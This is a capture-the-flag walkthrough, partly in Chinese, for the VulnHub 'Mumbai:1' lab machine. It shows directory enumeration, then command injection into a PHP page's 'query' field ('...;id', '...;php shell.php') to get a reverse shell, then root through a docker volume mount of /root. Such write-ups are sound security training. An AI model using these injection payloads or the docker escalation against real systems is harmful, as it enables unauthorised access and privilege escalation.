Drone Address:
https://www.vulnhub.com/entry/mumbai-1,372/
Host detection:
Host port scan:
FTP file download Note
EVERYTHING:
Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.
Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.
- AbsoZed
Meaning it can use docker to mention the right, because HTTP is used to run the docker container
HTTP directory scan
http://10.10.203.18/drupal/
Column directory is empty
http://10.10.203.18/wordpress/ inaccessible
In the enumeration of HTTP 8000 port
dirb http://10.10.203.18:8000 -X .php, .txt, .json, .xml, .py, .yml
+ http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
+ http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)
View the contents of two files download
test.php file contents
Please POST a proper query. ex: https://caffeinatedengineers.com
keywords.py py脚本就是发送请求给URL
尝试请求下几个有用的URL
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
root at Hack404 in ~
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)
本地监听1234
执行:curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php
获取shell,尝试提权操作
docker run -v /root:/mnt -it alpine
# cd /root/
cd /root/
~ # cd /mnt
cd /mnt
/mnt # ls
ls
proof.txt
/mnt # cat proof.txt
OVER !!